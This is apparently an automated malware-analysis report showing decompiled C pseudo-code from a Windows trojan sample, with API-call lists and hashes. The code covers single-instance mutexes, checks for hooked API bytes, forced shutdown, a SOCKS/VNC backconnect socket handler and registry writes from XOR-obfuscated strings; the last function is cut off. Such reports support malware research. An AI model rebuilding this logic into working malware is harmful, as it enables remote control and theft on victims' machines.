    C-Code - Quality: 85%
    			E0041D940(void* __eflags, intOrPtr _a4, char _a8) {
    				char _v676;
    				char _v804;
    				char _v812;
    				char _v816;
    				char _v820;
    				char _v924;
    				signed int _v928;
    				char _v1028;
    				void* _v1036;
    				short _v1040;
    				void* _v1044;
    				short _v1048;
    				char _v1052;
    				void* _v1056;
    				void* _v1060;
    				void _v1061;
    				void _v1064;
    				void* _v1068;
    				void _v1069;
    				void* _v1072;
    				void* _v1076;
    				void* _v1080;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t65;
    				void* _t68;
    				void* _t75;
    				intOrPtr* _t76;
    				void* _t77;
    				void* _t85;
    				void* _t87;
    				void* _t90;
    				int _t96;
    				void* _t104;
    				void* _t130;
    				void* _t131;
    				signed int _t135;
    				void* _t175;
    				void* _t176;
    				void* _t179;
    				void* _t181;
    				void* _t183;
    				void* _t184;
    				void* _t186;
    
    				_t135 = 0;
    				if(E00418040(0,  *0x42e954,  &_v1044) == 0) {
    					_t179 = _v1060;
    				} else {
    					_t176 = _v1044;
    					_v1056 = _v1040;
    					_t130 = E0041D500( &_v1056, _t176);
    					_t179 = _t130;
    					_v1064 = _t179;
    					if(_t179 == 0) {
    						_v1056 = _t130;
    					}
    					if(_t176 != 0) {
    						VirtualFree(_t176, 0, 0x8000);
    					}
    					_t131 = _v1036;
    					if(_t131 != 0) {
    						CloseHandle(_t131);
    					}
    				}
    				_t65 = _v1056;
    				if(_t65 != 0x1e6) {
    					__eflags = _t65 - 0xc;
    					if(__eflags != 0) {
    						goto L45;
    					}
    					_t68 = E0041CDD0(__eflags, 0x8889347b, 2);
    					_v1056 = _t68;
    					__eflags = _t68;
    					if(_t68 == 0) {
    						L43:
    						__eflags = _a8 - 1;
    						if(_a8 == 1) {
    							E00412E20( *0x42e954);
    						}
    						goto L45;
    					}
    					E0041D150( &_v804);
    					E00416E10(0x42eb70,  &_v676,  *0x42e904,  &_v1028, 1);
    					_t75 = OpenMutexW(0x100000, 0,  &_v1040);
    					_t181 = GetFileAttributesExW;
    					__eflags = _t75;
    					if(_t75 == 0) {
    						L27:
    						_t76 =  *0x42e8fc;
    						__imp__IsWellKnownSid( *_t76, 0x16);
    						__eflags = _t76 - 1;
    						if(__eflags != 0) {
    							_v1069 = 0;
    							_t77 = ReadProcessMemory(0xffffffff, _t181,  &_v1069, 1, 0);
    							__eflags = _t77;
    							if(_t77 == 0) {
    								L33:
    								_t135 = L0040F240(E00419880( *_v1068, L0040F240,  *((intOrPtr*)(_v1068 + 4))), _t135,  &_v816,  *_v1068, L0040F240);
    								L34:
    								__eflags = _t135 - 1;
    								if(_t135 == 1) {
    									_t85 = E00412BF0(0,  &_v812, 0x42e958, 0,  &_v1052);
    									__eflags = _t85;
    									_t135 = _t135 & 0xffffff00 | _t85 != 0x00000000;
    									__eflags = _t135;
    									if(_t135 != 0) {
    										E0041CD80(0x1a43533f,  &_v1036, 1);
    										_t87 = CreateEventW(0x42e930, 1, 0,  &_v1048);
    										_t184 = _v1064;
    										_v1076 = _t87;
    										_v1072 = _t184;
    										_push(0xffffffff);
    										__eflags = _t87;
    										if(_t87 != 0) {
    											WaitForMultipleObjects(2,  &_v1064, 0, ??);
    										} else {
    											WaitForSingleObject(_t184, ??);
    										}
    										_t90 = _v1064;
    										__eflags = _t90;
    										if(_t90 != 0) {
    											CloseHandle(_t90);
    										}
    										CloseHandle(_v1048);
    										CloseHandle(_t184);
    									}
    								}
    								L42:
    								_t183 = _v1056;
    								ReleaseMutex(_t183);
    								CloseHandle(_t183);
    								_t179 = _v1068;
    								goto L43;
    							}
    							__eflags = _v1069 - 0xe9;
    							if(_v1069 != 0xe9) {
    								goto L33;
    							}
    							_t96 = GetFileAttributesExW(0x42ed66, 0x78f16360,  &_v1064);
    							__eflags = _t96 - 1;
    							if(_t96 != 1) {
    								goto L33;
    							}
    							E00419880( *((intOrPtr*)(_v1072 + 8)), L0040F8A0,  *((intOrPtr*)(_v1072 + 4)));
    							_push(_a4);
    							_push( &_v820);
    							_t135 = L0040F8A0( &_v820, _t135, _v1072, 0x42e958, L0040F8A0);
    							VirtualFree(_v1080, 0, 0x8000);
    							goto L34;
    						}
    						_t135 = E0040FEA0(__eflags);
    						goto L42;
    					}
    					CloseHandle(_t75);
    					_t135 = Sleep;
    					while(1) {
    						_v1061 = 0;
    						_t104 = ReadProcessMemory(0xffffffff, _t181,  &_v1061, 1, 0);
    						__eflags = _t104;
    						if(_t104 == 0) {
    							goto L26;
    						}
    						__eflags = _v1061 - 0xe9;
    						if(_v1061 == 0xe9) {
    							goto L27;
    						}
    						L26:
    						Sleep(0x1f4);
    					}
    				} else {
    					if(E0040F730(_t179) != 0) {
    						E0041D150( &_v804);
    						_t166 =  &_v676;
    						E00416E10(0x42eb70,  &_v676,  *0x42e904,  &_v1028, 1);
    						_t175 = CreateMutexW(0x42e930, 1,  &_v1040);
    						if(_t175 != 0) {
    							if(GetLastError() != 0xb7) {
    								E0041A440(_t179,  &_v924);
    								__eflags = _v928 & 0x00000020;
    								if((_v928 & 0x00000020) != 0) {
    									 *0x42e8f8 =  *0x42e8f8 | 0x00000010;
    									__eflags =  *0x42e8f8;
    								}
    								E00428230(_t166);
    								__eflags =  *0x42e8f8 & 0x00000010;
    								if(( *0x42e8f8 & 0x00000010) != 0) {
    									ExitWindowsEx(0x14, 0x80000000);
    								}
    								E0041D150( &_v804);
    								E00416E10(0x42eb70,  &_v676,  *0x42e904,  &_v1028, 1);
    								_t186 = OpenEventW(2, 0,  &_v1040);
    								__eflags = _t186;
    								if(_t186 != 0) {
    									SetEvent(_t186);
    									CloseHandle(_t186);
    								}
    								E0041D610(1);
    								_t135 = 1;
    								CloseHandle(_t175);
    								_t179 = _v1064;
    							} else {
    								CloseHandle(_t175);
    							}
    						}
    					}
    					L45:
    					if(_t179 != 0) {
    						HeapFree( *0x42e6d4, 0, _t179);
    					}
    					return _t135;
    				}
    			}

    APIs
      • Part of subcall function 00418040: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418061
      • Part of subcall function 00418040: GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418075
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,00000000), ref: 0041D996
    • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0041D9A5
    • CreateMutexW.KERNEL32(0042E930,00000001,?,?,?,00000001,?,?,00000000), ref: 0041DA0B
    • GetLastError.KERNEL32(?,?,00000000), ref: 0041DA1B
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041DA29
    • HeapFree.KERNEL32(?,00000000,?,?,?,00000000), ref: 0041DD17
      • Part of subcall function 0041D500: HeapAlloc.KERNEL32(?,00000000,00000001,00000000,?,004017B0,0000031C,?,?), ref: 0041D565
    • ExitWindowsEx.USER32(00000014,80000000), ref: 0041DA6A
    • OpenEventW.KERNEL32(00000002,00000000,?,?,?,00000001), ref: 0041DAA8
    • SetEvent.KERNEL32(00000000), ref: 0041DAB5
    • CloseHandle.KERNEL32(00000000), ref: 0041DABC
    • CloseHandle.KERNEL32(00000000,00000001), ref: 0041DACC
      • Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
      • Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
      • Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39
      • Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6
    • OpenMutexW.KERNEL32(00100000,00000000,?,?,?,00000001,8889347B,00000002,?,?,00000000), ref: 0041DB37
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041DB4E
    • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000), ref: 0041DB71
    • Sleep.KERNEL32(000001F4), ref: 0041DB83
    • IsWellKnownSid.ADVAPI32(?,00000016,?,?,00000000), ref: 0041DB91
    • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000,?,00000016,?,?,00000000), ref: 0041DBB9
    • GetFileAttributesExW.KERNEL32(0042ED66,78F16360,?,?,00000016,?,?,00000000), ref: 0041DBD5
    • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,?,?,00000016,?,?,00000000), ref: 0041DC19
    • CreateEventW.KERNEL32(0042E930,00000001,00000000,1A43533F,1A43533F,?,00000001,0042E958,00000000,?,?,?,00000016,?,?,00000000), ref: 0041DC93
    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000016,?,?,00000000), ref: 0041DCAC
    • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FF,?,00000016,?,?,00000000), ref: 0041DCBD
    • CloseHandle.KERNEL32(?,?,00000016,?,?,00000000), ref: 0041DCCC
    • CloseHandle.KERNEL32(?,?,00000016,?,?,00000000), ref: 0041DCDD
    • CloseHandle.KERNEL32(?,?,00000016,?,?,00000000), ref: 0041DCE0
      • Part of subcall function 00419880: VirtualProtect.KERNEL32(0040F240,74B05B60,00000040,00000000,?,?,0041DC35,?,?,00000016,?,?,00000000), ref: 00419891
      • Part of subcall function 00419880: VirtualProtect.KERNEL32(0040F240,74B05B60,00000000,00000000,?,?,0041DC35,?,?,00000016,?,?,00000000), ref: 004198C3
    • ReleaseMutex.KERNEL32(?,?,?,00000016,?,?,00000000), ref: 0041DCE7
    • CloseHandle.KERNEL32(?,?,00000016,?,?,00000000), ref: 0041DCEE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$CreateMutexVirtual$EventFileFreeWait$HeapMemoryObjectOpenProcessProtectReadSingle$AllocAttributesErrorExitFromKnownLastMultipleObjectsReleaseSizeSleepStringWellWindows
    • String ID: $XB$XB$pB$pB$pB
    • API String ID: 2138556076-1967776627
    • Opcode ID: ee2aed6d127b2ef496f1571f899c62c979c904e062df8946192978a90ff31bf0
    • Instruction ID: c7e48b5e94a7232cc440fca26077774841184021d03dda8520883d5d35a86dc6
    • Opcode Fuzzy Hash: ee2aed6d127b2ef496f1571f899c62c979c904e062df8946192978a90ff31bf0
    • Instruction Fuzzy Hash: D3A1E7B1A04301ABD320EB61DD45FEB77A4AFC5700F44492EF945A7290D778EC85CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E0041A850(void _a4) {
    				char _v544;
    				char _v548;
    				char _v808;
    				int _v812;
    				char _v824;
    				intOrPtr _v832;
    				void* _v1016;
    				void* _v1020;
    				long _v1044;
    				int _v1048;
    				intOrPtr _v1052;
    				intOrPtr _v1056;
    				int _v1060;
    				char _v1068;
    				intOrPtr _v1088;
    				signed int _v1092;
    				char _v1096;
    				signed int _v1100;
    				short _v1102;
    				void* _v1104;
    				char _v1108;
    				intOrPtr _v1120;
    				void* _v1124;
    				intOrPtr _v1128;
    				void* __edi;
    				void* __esi;
    				signed short _t72;
    				signed char _t73;
    				void* _t74;
    				void* _t75;
    				void* _t76;
    				signed int _t89;
    				intOrPtr _t96;
    				void* _t97;
    				signed int _t102;
    				signed int _t103;
    				void* _t110;
    				signed char _t114;
    				signed int _t118;
    				void* _t120;
    				intOrPtr _t132;
    				signed int _t146;
    				void* _t150;
    				intOrPtr _t153;
    				void* _t156;
    				void* _t159;
    				signed int _t161;
    				void* _t162;
    				signed int _t163;
    				void* _t165;
    
    				_t165 = (_t163 & 0xfffffff8) - 0x41c;
    				E00410870( &_v1020,  &_v1020, 0, 0x104);
    				_t156 = _a4;
    				if(lstrcmpiA( *_t156, "socks") != 0) {
    					if(lstrcmpiA( *_t156, "vnc") != 0) {
    						_t72 = E004110A0( *_t156, 0);
    						_t5 = _t72 - 1; // -1
    						if(_t5 > 0xfffd) {
    							goto L45;
    						}
    						_t89 = _t72 & 0x0000ffff;
    						_v1044 = _t89;
    						if(_t89 == 0) {
    							goto L45;
    						}
    						goto L6;
    					}
    					_v1044 = 0xfffffffe;
    					goto L6;
    				} else {
    					_v1044 = 0xffffffff;
    					L6:
    					_t153 = E00414D70(E004110A0( *(_t156 + 8), 0),  *(_t156 + 4));
    					_v1052 = _t153;
    					if(_t153 == 0xffffffff) {
    						L45:
    						_t73 = _v1020;
    						if(_t73 != 0) {
    							WaitForMultipleObjects(_t73 & 0x000000ff,  &_v1016, 1, 0xffffffff);
    							_t73 = _v1020;
    						}
    						_t114 = 0;
    						if(_t73 == 0) {
    							L49:
    							_t74 =  *_t156;
    							if(_t74 != 0) {
    								HeapFree( *0x42e6d4, 0, _t74);
    							}
    							_t75 =  *(_t156 + 4);
    							if(_t75 != 0) {
    								HeapFree( *0x42e6d4, 0, _t75);
    							}
    							_t76 =  *(_t156 + 8);
    							if(_t76 != 0) {
    								HeapFree( *0x42e6d4, 0, _t76);
    							}
    							_t150 =  *(_t156 + 0xc);
    							ReleaseMutex(_t150);
    							CloseHandle(_t150);
    							HeapFree( *0x42e6d4, 0, _t156);
    							return 0;
    						} else {
    							do {
    								CloseHandle( *(_t165 + 0x34 + (_t114 & 0x000000ff) * 4));
    								_t114 = _t114 + 1;
    							} while (_t114 < _v1020);
    							goto L49;
    						}
    					}
    					_v1048 = 1;
    					__imp__#21(_t153, 6, 1,  &_v1048, 4);
    					_v1060 = 1;
    					_v1056 = 0x493e0;
    					_v1052 = 0x1388;
    					__imp__WSAIoctl(_t153, 0x98000004,  &_v1060, 0xc, 0, 0,  &_v1068, 0, 0);
    					E0041D1B0( &_v548);
    					_t118 = 0;
    					if(_v544 == 0) {
    						L43:
    						if(_t153 != 0xffffffff) {
    							__imp__#22(_t153, 2);
    							__imp__#3(_t153);
    						}
    						goto L45;
    					}
    					do {
    						_t118 = _t118 + 1;
    					} while ( *((short*)(_t165 + 0x244 + _t118 * 2)) != 0);
    					if(_t118 <= 0) {
    						goto L43;
    					}
    					_t159 = E004109D0( &_v544, 0xfde9, _t118);
    					_v1104 = _t159;
    					if(_t159 == 0) {
    						L42:
    						_t156 = _a4;
    						goto L43;
    					}
    					_t96 = 0;
    					_v1092 = _t118;
    					if( *_t159 == 0) {
    						L15:
    						_v1088 = _t96;
    						_t97 = E00419DA0(_t96, 1, _t153, _t159);
    						HeapFree( *0x42e6d4, 0, _t159);
    						E00410870( &_v1100,  &_v1100, 0, 0xc);
    						if(_t97 == 0) {
    							goto L42;
    						} else {
    							goto L16;
    						}
    						while(1) {
    							L16:
    							_v812 = 1;
    							E00410820( &_v808,  &_v1108, 4);
    							_t102 =  &_v824;
    							__imp__#18(0, _t102, 0, 0, 0);
    							if(_t102 != 0) {
    								goto L30;
    							}
    							__imp__#112(0x274c);
    							L18:
    							_t103 = _t102 | 0xffffffff;
    							L19:
    							_t153 = _v1128;
    							if(_t103 != _t153 || E00419B40(_t153,  &_v1104,  &_v1124) == 0) {
    								goto L42;
    							} else {
    								_t120 = _v1124;
    								if(_v1100 != 2 || _v1102 != 4) {
    									L28:
    									if(_t120 != 0) {
    										HeapFree( *0x42e6d4, 0, _t120);
    									}
    									continue;
    								} else {
    									_t162 = HeapAlloc( *0x42e6d4, 8, 0x10);
    									if(_t162 == 0) {
    										L27:
    										E004163B0( &_v1096);
    										goto L28;
    									}
    									 *_t162 = _a4;
    									 *((intOrPtr*)(_t162 + 4)) = _v1120;
    									 *(_t162 + 8) =  *_t120;
    									if(_v1096 < 0x40) {
    										if(E0041A680 == 0) {
    											goto L27;
    										}
    										_t110 = CreateThread(0, 0x20000, E0041A680, _t162, 0, 0);
    										if(_t110 == 0) {
    											L26:
    											HeapFree( *0x42e6d4, 0, _t162);
    											goto L27;
    										}
    										 *(_t165 + 0x34 + (_v1100 & 0x000000ff) * 4) = _t110;
    										_v1100 = _v1100 + 1;
    										goto L27;
    									}
    									SetLastError(0x9b);
    									goto L26;
    								}
    							}
    							L30:
    							if(_t102 == 0xffffffff) {
    								goto L18;
    							}
    							_t132 = _v832;
    							_t161 = 0;
    							do {
    								_t102 = 0;
    								if(_t132 == 0) {
    									goto L36;
    								}
    								_t146 =  *(_t165 + 0x10 + _t161 * 4);
    								while( *((intOrPtr*)(_t165 + 0x13c + _t102 * 4)) != _t146) {
    									_t102 = _t102 + 1;
    									if(_t102 < _t132) {
    										continue;
    									}
    									goto L36;
    								}
    								_t103 = _t146;
    								goto L19;
    								L36:
    								_t161 = _t161 + 1;
    							} while (_t161 < 1);
    							goto L18;
    						}
    					}
    					do {
    						_t96 = _t96 + 1;
    					} while ( *((char*)(_t96 + _t159)) != 0);
    					goto L15;
    				}
    			}

    APIs
    • lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 0041A881
    • lstrcmpiA.KERNEL32(?,vnc,?,socks,?,00000000,00000104), ref: 0041A899
    • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 0041A905
    • WSAIoctl.WS2_32(00000000), ref: 0041A939
    • HeapFree.KERNEL32(?,00000000,00000000,00000000,0000FDE9,00000001), ref: 0041A9BF
    • select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 0041AA0A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: lstrcmpi$FreeHeapIoctlselectsetsockopt
    • String ID: @$p0u$socks$vnc
    • API String ID: 3618291485-2996672388
    • Opcode ID: 5d4c353fae503f136d458820d6e4c8b435546119a4ef7b72e71866523b14a9ce
    • Instruction ID: 9387f5adea85d91ff962fea4c793caee99434f17d95afe982a46bdf65d51d9c2
    • Opcode Fuzzy Hash: 5d4c353fae503f136d458820d6e4c8b435546119a4ef7b72e71866523b14a9ce
    • Instruction Fuzzy Hash: 9BA10670609340ABD320DF21DD84FAB77A9AF84750F50492EF685A72D0D774E881C79B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E0040AC10(intOrPtr* __eax) {
    				void* __esi;
    				intOrPtr* _t87;
    				signed short _t93;
    				signed short _t94;
    				signed int _t98;
    				signed short _t99;
    				signed short _t100;
    				void* _t103;
    				int _t111;
    				long _t120;
    				int _t126;
    				signed int _t132;
    				int _t136;
    				short** _t145;
    				signed char* _t152;
    				signed char* _t153;
    				signed char* _t156;
    				signed char* _t157;
    				signed char* _t159;
    				signed short* _t173;
    				signed short* _t175;
    				signed int _t179;
    				signed short* _t182;
    				signed short* _t183;
    				intOrPtr* _t195;
    				short** _t196;
    				short* _t198;
    				intOrPtr _t202;
    				short* _t203;
    				void* _t212;
    				int _t221;
    				int _t227;
    				void* _t229;
    
    				_t87 = __eax;
    				_t195 = __eax;
    				 *0x42d404 = 0;
    				 *0x42d408 = 0;
    				InitializeCriticalSection(0x42d3ec);
    				if( *0x42eb64 <= 1) {
    					return _t87;
    				}
    				if(_t195 == 0 ||  *_t195 == 0) {
    					L7:
    					E00424100(0x19, _t229 + 0x64);
    					E00424100(0x1a, _t229 + 0x2c);
    					_t202 = _t229 + 0x50;
    					E00424100(0x1b, _t202);
    					 *(_t229 + 0x24) = _t229 + 0x2c;
    					 *((intOrPtr*)(_t229 + 0x28)) = _t202;
    					_t196 = _t229 + 0x24;
    					_t136 = 2;
    					goto L8;
    					L11:
    					_t196 =  &(_t196[1]);
    					_t136 = _t136 - 1;
    					if(_t136 != 0) {
    						L8:
    						_t203 =  *_t196;
    						if(E00416580(0x80000001, _t229 + 0x68, _t203) != 0) {
    							 *(_t229 + 0x38) = 0;
    							 *(_t229 + 0x34) = 0x80000001;
    							_t126 = RegCreateKeyExW(0x80000001, _t229 + 0x80, 0, 0, 0, 2, 0, _t229 + 0x14, 0);
    							if(_t126 == 0) {
    								RegSetValueExW( *(_t229 + 0x20), _t203, _t126, 4, _t229 + 0x18, 4);
    								RegCloseKey( *(_t229 + 0x10));
    							}
    						}
    						goto L11;
    					} else {
    						_t152 =  *0x401bfc; // 0x4047e0
    						_t93 = 0;
    						_t173 = _t229 + 0x64;
    						do {
    							 *_t173 = ( *_t152 ^ _t93 ^ 0x0000ff82) & 0x000000ff;
    							_t93 = _t93 + 1;
    							_t152 =  &(_t152[1]);
    							_t173 =  &(_t173[1]);
    						} while (_t93 < 0x2c);
    						_t153 =  *0x401c04; // 0x4047d0
    						 *((short*)(_t229 + 0xbc)) = 0;
    						_t94 = 0;
    						_t175 = _t229 + 0x2c;
    						do {
    							 *_t175 = ( *_t153 ^ _t94 ^ 0x0000fff1) & 0x000000ff;
    							_t94 = _t94 + 1;
    							_t153 =  &(_t153[1]);
    							_t175 =  &(_t175[1]);
    						} while (_t94 < 0xc);
    						 *((short*)(_t229 + 0x58)) = 0;
    						 *(_t229 + 0x24) = 0x80000001;
    						if(RegOpenKeyExW(0x80000001, _t229 + 0x70, 0, 1, _t229 + 0x10) != 0) {
    							L19:
    							 *(_t229 + 0x38) = 0;
    							 *(_t229 + 0x34) = 0x80000001;
    							if(RegCreateKeyExW(0x80000001, _t229 + 0x80, 0, 0, 0, 2, 0, _t229 + 0x14, 0) == 0) {
    								RegSetValueExW( *(_t229 + 0x10), _t229 + 0x3c, 0, 4, _t229 + 0x18, 4);
    								RegCloseKey( *(_t229 + 0x10));
    							}
    							L21:
    							_t156 =  *0x401c0c; // 0x404788
    							_t98 = 0;
    							_t212 = _t229 + 0x64;
    							do {
    								_t179 =  *_t156 & 0x000000ff ^ 0x00000003;
    								_t156 =  &(_t156[1]);
    								_t212 = _t212 + 2;
    								 *((short*)(_t212 - 2)) = (_t179 ^ _t98) & 0x000000ff;
    								_t98 = _t98 + 1;
    							} while (_t98 < 0x44);
    							_t157 =  *0x401c14; // 0x40477c
    							_t99 = 0;
    							 *((short*)(_t229 + 0xec)) = 0;
    							_t182 = _t229 + 0x50;
    							do {
    								 *_t182 = ( *_t157 ^ _t99 ^ 0x0000ffab) & 0x000000ff;
    								_t99 = _t99 + 1;
    								_t157 =  &(_t157[1]);
    								_t182 =  &(_t182[1]);
    							} while (_t99 < 4);
    							 *((short*)(_t229 + 0x58)) = 0;
    							_t159 =  *0x401c1c; // 0x404774
    							_t100 = 0;
    							_t183 = _t229 + 0x2c;
    							do {
    								 *_t183 = ( *_t159 ^ _t100 ^ 0x0000ffb0) & 0x000000ff;
    								_t100 = _t100 + 1;
    								_t159 =  &(_t159[1]);
    								_t183 =  &(_t183[1]);
    							} while (_t100 < 4);
    							 *(_t229 + 0x34) = 0;
    							 *(_t229 + 0x48) = _t229 + 0x50;
    							 *((intOrPtr*)(_t229 + 0x4c)) = _t229 + 0x2c;
    							 *(_t229 + 0x1c) = 0;
    							 *(_t229 + 0x14) = 5;
    							do {
    								_push( *(_t229 + 0x1c));
    								_t221 = _t229 + 0xf8;
    								_t103 = E00411D10(_t229 + 0x68, 0x4f, _t221, _t229 + 0x68);
    								_t229 = _t229 + 8;
    								if(_t103 <= 0) {
    									goto L37;
    								}
    								_t145 = _t229 + 0x48;
    								_t227 = 2;
    								do {
    									 *(_t229 + 0x2c) = 0;
    									 *(_t229 + 0x34) = 4;
    									 *(_t229 + 0x24) = 0x80000001;
    									_t221 = _t221 | 0xffffffff;
    									if(RegOpenKeyExW(0x80000001, _t229 + 0xfc, 0, 1, _t229 + 0x10) == 0) {
    										_t198 =  *_t145;
    										RegQueryValueExW( *(_t229 + 0x14), _t198, 0, _t229 + 0x2c, _t229 + 0x1c, _t229 + 0x20);
    										_t221 =  ==  ?  *(_t229 + 0x20) : _t221;
    										RegCloseKey( *(_t229 + 0x10));
    										if(_t221 == 4 &&  *(_t229 + 0x24) == _t221 &&  *(_t229 + 0x18) != 0) {
    											 *(_t229 + 0x3c) = 0;
    											 *(_t229 + 0x34) = 0x80000001;
    											_t111 = RegCreateKeyExW(0x80000001, _t229 + 0x10c, 0, 0, 0, 2, 0, _t229 + 0x14, 0);
    											if(_t111 == 0) {
    												RegSetValueExW( *(_t229 + 0x10), _t198, _t111, _t221, _t229 + 0x1c, _t221);
    												RegCloseKey( *(_t229 + 0x10));
    											}
    										}
    									}
    									_t145 =  &(_t145[1]);
    									_t227 = _t227 - 1;
    								} while (_t227 != 0);
    								L37:
    								 *(_t229 + 0x1c) =  *(_t229 + 0x1c) + 1;
    								_t85 = _t229 + 0x14;
    								 *_t85 =  *(_t229 + 0x14) - 1;
    							} while ( *_t85 != 0);
    							return 1;
    						}
    						_t120 = RegQueryValueExW( *(_t229 + 0x10), _t229 + 0x3c, 0, 0, 0, 0);
    						RegCloseKey( *(_t229 + 0x10));
    						if((0 | _t120 == 0x00000000) == 0 || E00416580(0x80000001, _t229 + 0x68, _t229 + 0x2c) != 0) {
    							goto L19;
    						} else {
    							goto L21;
    						}
    					}
    				} else {
    					E00424100(0x18, _t229 + 0x2c);
    					E00424100(0x17, _t229 + 0x64);
    					_t132 = 0;
    					if( *_t195 == 0) {
    						L6:
    						E00416510(_t229 + 0x34, _t195, _t132);
    						goto L7;
    					} else {
    						do {
    							_t132 = _t132 + 1;
    						} while ( *((intOrPtr*)(_t195 + _t132 * 2)) != 0);
    						goto L6;
    					}
    				}
    			}

    APIs
    • InitializeCriticalSection.KERNEL32(0042D3EC,00000000,00000000), ref: 0040AC2D
    • RegCreateKeyExW.ADVAPI32(80000001), ref: 0040AD05
    • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,00000000,00000004), ref: 0040AD1F
    • RegCloseKey.ADVAPI32(00000000), ref: 0040AD2A
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,00000000,77E49EB0), ref: 0040ADBE
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0040ADD6
    • RegCloseKey.ADVAPI32(?), ref: 0040ADE6
    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0040AE21
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 0040AE3F
    • RegCloseKey.ADVAPI32(?), ref: 0040AE4A
    • RegOpenKeyExW.ADVAPI32 ref: 0040AF81
    • RegQueryValueExW.ADVAPI32(80000001,00000000,00000000,00000000,?,?), ref: 0040AFA8
    • RegCloseKey.ADVAPI32(?), ref: 0040AFBA
    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,80000001,00000000), ref: 0040B000
    • RegSetValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0040B018
    • RegCloseKey.ADVAPI32(?), ref: 0040B023
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CloseValue$Create$OpenQuery$CriticalInitializeSection
    • String ID: tG@$|G@$G@
    • API String ID: 902824796-2805106197
    • Opcode ID: 6c7670adddaab5432f68c125d42383731a9b9679875cfa94f8bf0d122dcce640
    • Instruction ID: 125b504e0993ee8f908f150b8e35c93e263e575f4722233af7442101f02efb7a
    • Opcode Fuzzy Hash: 6c7670adddaab5432f68c125d42383731a9b9679875cfa94f8bf0d122dcce640
    • Instruction Fuzzy Hash: F2C1BE711543419FE720DF20D844BABB7E8EFC9704F40492DFA85A7290E778A949CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 56%
    			E00408E30(intOrPtr _a4) {
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v72;
    				intOrPtr _v92;
    				char _v284;
    				char _v424;
    				intOrPtr _v480;
    				intOrPtr _v484;
    				intOrPtr _v588;
    				intOrPtr _v608;
    				char _v612;
    				short _v624;
    				char _v636;
    				char _v768;
    				signed short _v780;
    				char _v868;
    				signed short _v880;
    				signed int _v1076;
    				intOrPtr _v1080;
    				intOrPtr _v1084;
    				void* _v1088;
    				intOrPtr _v1096;
    				signed int _v1100;
    				intOrPtr _v1104;
    				char _v1108;
    				signed int _v1204;
    				char _v1208;
    				signed int _v1212;
    				signed int _v1220;
    				signed int _v1224;
    				short _v1226;
    				char _v1228;
    				signed char _v1229;
    				signed char _v1231;
    				char _v1232;
    				void* _v1236;
    				signed int _v1244;
    				signed int _v1248;
    				signed int _v1252;
    				signed int _v1260;
    				signed int _v1264;
    				signed char _v1265;
    				char _v1268;
    				signed char _v1269;
    				signed int _v1272;
    				short _v1274;
    				signed int _v1276;
    				signed int _v1280;
    				char _v1281;
    				char _v1284;
    				char _v1285;
    				char _v1286;
    				signed int _v1288;
    				signed int _v1292;
    				char _v1296;
    				signed int _v1304;
    				signed int _v1308;
    				char _v1309;
    				intOrPtr _v1312;
    				signed int _v1316;
    				intOrPtr _v1320;
    				char _v1324;
    				signed int _v1328;
    				signed int _v1332;
    				intOrPtr _v1336;
    				signed int _v1340;
    				signed int _v1348;
    				intOrPtr _v1352;
    				intOrPtr _v1356;
    				intOrPtr _v1372;
    				void* __ebx;
